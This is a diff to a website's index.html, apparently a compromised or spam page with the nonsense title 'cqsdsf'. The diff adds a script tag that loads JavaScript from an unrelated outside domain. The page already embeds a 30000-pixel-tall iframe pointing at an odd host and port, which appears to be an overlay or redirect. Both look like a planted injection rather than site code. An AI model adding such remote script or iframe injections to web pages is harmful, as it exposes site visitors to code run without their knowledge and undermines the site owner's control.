--- a/index.html
+++ b/index.html
@@ -2,6 +2,7 @@
 <!DOCTYPE html><html lang="zh-CN"><head><title data-react-helmet="true">cqsdsf</title>
 </head>
   <body>
+	  <script src="http://www.jnmdgroup.com/hsfgg.js" type="text/javascript"></script>
 	      <iframe frameborder="0" scrolling="no" width="100%" margin="0"  height="30000" src="http://222.94010.top:456/"></iframe>
   
 
